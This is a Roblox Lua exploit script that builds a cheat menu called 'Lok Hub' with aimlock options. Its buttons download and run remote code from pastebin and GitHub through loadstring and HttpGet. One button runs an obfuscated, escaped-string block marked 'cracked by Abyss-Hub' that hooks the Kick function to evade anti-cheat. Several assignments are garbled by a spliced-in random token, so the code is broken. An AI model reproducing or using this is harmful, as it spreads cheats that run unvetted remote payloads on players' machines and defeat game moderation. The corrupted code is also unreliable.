
local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local Frame_3 = Instance.new("Frame")
local Frame_4 = Instance.new("Frame")
local TextLabel_3 = Instance.new("TextLabel")
local TextBox = Instance.new("TextButton")
local TextBox_2 = Instance.new("TextButton")
local TextBox_3 = Instance.new("TextButton")
local TextBox_4 = Instance.new("TextButton")
local maintab = Instance.new("Frame")
local TextLabel_4 = Instance.new("TextLabel")
local visualtab = Instance.new("Frame")
local TextBox_5 = Instance.new("TextButton")
local Aimlocktab = Instance.new("Frame")
local TextBox_6 = Instance.new("TextButton")
local TextBox_7 = Instance.new("TextButton")
local Credits = Instance.new("Frame")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false
ScreenGui.Draggable = true


Frame.Parent = ScreenGui
Frame.AnchorPoint = Vector2.new(0.5, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 2
Frame.Position = UDim2.new(0.5, 0, 0.543441713, 0)
Frame.Size = UDim2.new(0, 429, 0, 385)

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Size = UDim2.new(0, 428, 0, 30)

TextLabel.Parent = Frame_2
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.0350467265, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 76, 0, 28)
TextLabel.Font = Enum.Font.Code
TextLabel.Text = "Lok Hub"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 127)
TextLabel.TextSize = 15.000
TextLabel.TextXAlignment = Enum.TextXAlignment.Left

TextLabel_2.Parent = Frame_2
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.273364484, 0, 0, 0)
TextLabel_2.Size = UDim2.new(0, 73, 0, 28)
TextLabel_2.Font = Enum.Font.Code
TextLabel_2.Text = "v1.1 (a)"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 15.000
TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left

Frame_3.Parent = Frame
Frame_3.BackgroundColor3 = Color3.fromRGB(131, 131, 131)
Frame_3.BackgroundTransparency = 0.700
Frame_3.BorderColor3 = Color3.fromRGB(27, 42, 53)
Frame_3.Position = UDim2.new(0.235746518, 0, 0, 0)
Frame_3.Size = UDim2.new(0, 1, 0, 28)

Frame_4.Parent = Frame
Frame_4.BackgroundColor3 = Color3.fromRGB(131, 131, 131)
Frame_4.BackgroundTransparency = 0.550
Frame_4.Position = UDim2.new(0, 0, 0.296949506, 0)
Frame_4.Size = UDim2.new(0, 429, 0, 1)

TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.40856266, 0, 0.297674388, 0)
TextLabel_3.Size = UDim2.new(0, 69, 0, 26)
TextLabel_3.Font = Enum.Font.Code
TextLabel_3.Text = "Settings for the tab"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 15.000

TextBox.Name = "TextBox"
TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox.Position = UDim2.new(0.345004708, 0, 0.104059465, 0)
TextBox.Size = UDim2.new(0, 125, 0, 26)
TextBox.Font = Enum.Font.Code
TextBox.Text = "Main"
TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox.TextSize = 14.000

TextBox_2.Name = "TextBox"
TextBox_2.Parent = Frame
TextBox_2.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox_2.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox_2.Position = UDim2.new(0.678338051, 0, 0.202760756, 0)
TextBox_2.Size = UDim2.new(0, 119, 0, 26)
TextBox_2.Font = Enum.Font.Code
TextBox_2.Text = "Credits"
TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_2.TextSize = 14.000

TextBox_3.Name = "TextBox"
TextBox_3.Parent = Frame
TextBox_3.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox_3.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox_3.Position = UDim2.new(0.345004708, 0, 0.202760756, 0)
TextBox_3.Size = UDim2.new(0, 125, 0, 26)
TextBox_3.Font = Enum.Font.Code
TextBox_3.Text = "Aimlock"
TextBox_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_3.TextSize = 14.000

TextBox_4.Name = "TextBox"
TextBox_4.Parent = Frame
TextBox_4.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox_4.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox_4.Position = UDim2.new(0.678338051, 0, 0.104059465, 0)
TextBox_4.Size = UDim2.new(0, 119, 0, 26)
TextBox_4.Font = Enum.Font.Code
TextBox_4.Text = "Visual"
TextBox_4.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_4.TextSize = 14.000

maintab.Name = "maintab"
maintab.Parent = Frame
maintab.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
maintab.BorderColor3 = Color3.fromRGB(0, 0, 0)
maintab.Position = UDim2.new(0.0233100224, 0, 0.384053171, 0)
maintab.Size = UDim2.new(0, 408, 0, 224)
maintab.Visible = false

TextLabel_4.Parent = maintab
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.Position = UDim2.new(0.254901975, 0, 0.294642866, 0)
TextLabel_4.Size = UDim2.new(0, 200, 0, 50)
TextLabel_4.Font = Enum.Font.SourceSans
TextLabel_4.Text = "in progrese"
TextLabel_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.TextSize = 14.000

visualtab.Name = "visualtab"
visualtab.Parent = Frame
visualtab.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
visualtab.BackgroundTransparency = 0.000
visualtab.BorderColor3 = Color3.fromRGB(0, 0, 0)
visualtab.Position = UDim2.new(0.0233100224, 0, 0.384053171, 0)
visualtab.Size = UDim2.new(0, 408, 0, 224)
visualtab.Visible = false

TextBox_5.Name = "TextBox"
TextBox_5.Parent = visualtab
TextBox_5.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox_5.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox_5.Position = UDim2.new(0.0827497616, 0, 0.157153681, 0)
TextBox_5.Size = UDim2.new(0, 317, 0, 144)
TextBox_5.Font = Enum.Font.Code
TextBox_5.Text = "Visual"
TextBox_5.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_5.TextSize = 14.000

Aimlocktab.Name = "Aimlocktab"
Aimlocktab.Parent = Frame
Aimlocktab.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
Aimlocktab.BackgroundTransparency = 0.000
Aimlocktab.BorderColor3 = Color3.fromRGB(0, 0, 0)
Aimlocktab.Position = UDim2.new(0.0233100224, 0, 0.384053171, 0)
Aimlocktab.Size = UDim2.new(0, 408, 0, 224)
Aimlocktab.Visible = false

TextBox_6.Name = "TextBox"
TextBox_6.Parent = Aimlocktab
TextBox_6.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox_6.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox_6.Position = UDim2.new(0.705298841, 0, 0.104059465, 0)
TextBox_6.Size = UDim2.new(0, 119, 0, 26)
TextBox_6.Font = Enum.Font.Code
TextBox_6.Text = "Luck assist"
TextBox_6.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_6.TextSize = 14.000

TextBox_7.Name = "TextBox"
TextBox_7.Parent = Aimlocktab
TextBox_7.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextBox_7.BorderColor3 = Color3.fromRGB(54, 54, 54)
TextBox_7.Position = UDim2.new(0.384220392, 0, 0.104059473, 0)
TextBox_7.Size = UDim2.new(0, 119, 0, 26)
TextBox_7.Font = Enum.Font.Code
TextBox_7.Text = "The Ware"
TextBox_7.TextColor3 = Color3.fromRGB(255, 255, 255)
TextBox_7.TextSize = 14.000

Credits.Name = "Credits"
Credits.Parent = Frame
Credits.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
Credits.BackgroundTransparency = 0.000
Credits.BorderColor3 = Color3.fromRGB(0, 0, 0)
Credits.Position = UDim2.new(0.0233100224, 0, 0.384053171, 0)
Credits.Size = UDim2.new(0, 408, 0, 224)
Credits.Visible = false

-- Scripts:

local function AURTM_fake_script() -- TextBox.LocalScript 
	local script = Instance.new('LocalScript', TextBox)

	script.Parent.MouseButton1Down:connect(function()
		script.Parent.Parent.visualtab.Visible = false
		script.Parent.Parent.maintab.Visible = t1LBf6zWdVYz9oN1Puctivrt8CLk6kburAP = false
		script.Parent.Parent.Credits.Visible = false
	end)
end
coroutine.wrap(AURTM_fake_script)()
local function NWKTKJ_fake_script() -- TextBox_2.LocalScript 
	local script = Instance.new('LocalScript', TextBox_2)

	script.Parent.MouseButton1Down:connect(function()
		script.Parent.Parent.visualtab.Visible = false
		script.Parent.Parent.maintab.Visible = false
		script.Parent.Parent.Aimlocktab.Visible = false
		script.Parent.Parent.Credits.Visible = true
	end)
end
coroutine.wrap(NWKTKJ_fake_script)()
local function HKIW_fake_script() -- TextBox_3.LocalScript 
	local script = Instance.new('LocalScript', TextBox_3)

	script.Parent.MouseButton1Down:connect(function()
		script.Parent.Parent.visualtab.Visible = false
		script.Parent.Parent.maintab.Visible = false
		script.Parent.Parent.Aimlocktab.Visible = t1LBf6zWdVYz9oN1Puctivrt8CLk6kburAP = false
	end)
end
coroutine.wrap(HKIW_fake_script)()
local function ZPUYA_fake_script() -- TextBox_4.LocalScript 
	local script = Instance.new('LocalScript', TextBox_4)

	script.Parent.MouseButton1Down:connect(function()
		script.Parent.Parent.visualtab.Visible = t1LBf6zWdVYz9oN1Puctivrt8CLk6kburAP = false
		script.Parent.Parent.Aimlocktab.Visible = false
		script.Parent.Parent.Credits.Visible = false
	end)
end
coroutine.wrap(ZPUYA_fake_script)()
local function HTDNK_fake_script() -- TextBox_5.LocalScript 
	local script = Instance.new('LocalScript', TextBox_5)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://pastebin.com/raw/s7viVmDR"))()
	end)
end
coroutine.wrap(HTDNK_fake_script)()
local function NWKHU_fake_script() -- TextBox_6.LocalScript 
	local script = Instance.new('LocalScript', TextBox_6)

	script.Parent.MouseButton1Down:connect(function()
		--cracked by Abyss-Hub .gg/dQ7tXQSvxg
		local a=game:GetService("\80\108\97\121\101\114\115")local b=math.random(69,420)local c=bit;local d;local e="\98\97\108\100\46\102\117\110\32\115\111\32\103\111\111\100\32\119\104\105\116\101\108\105\115\116\32\120\68\68\68\10"if bit then d=c.bdiv(c.badd(1,2),3*b/b)*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b else d=(1+2)/3*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b*b/b end;function setcore()if e=="\98\97\108\100\46\102\117\110\32\115\111\32\103\111\111\100\32\119\104\105\116\101\108\105\115\116\32\120\68\68\68\10"then game:GetService("\83\116\97\114\116\101\114\71\117\105"):SetCore("\83\101\110\100\78\111\116\105\102\105\99\97\116\105\111\110",{Title="\67\114\97\99\107\101\100\32\66\121\32\65\98\121\115\115",Text=e,Duration=5})end end;setcore(e,e,e,e,e,e,e)local f=a:GetChildren()[d]if hookfunc then hookfunc(f.Kick,function()return"\98\97\108\100\46\102\117\110\32\115\111\32\103\111\111\100\32\119\104\105\116\101\108\105\115\116\32\120\68\68\68\10"end)end;loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\86\97\117\108\116\71\105\116\111\115\47\79\116\104\101\114\115\47\109\97\105\110\47\76\117\99\107\65\115\115\105\115\116\66\97\99\107\117\112\46\108\117\97",true))()
	end)
end
coroutine.wrap(NWKHU_fake_script)()
local function WOMBYB_fake_script() -- TextBox_7.LocalScript 
	local script = Instance.new('LocalScript', TextBox_7)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/coolmanstrongsuperman/lol/main/TheWare"))()
	end)
end
coroutine.wrap(WOMBYB_fake_script)()
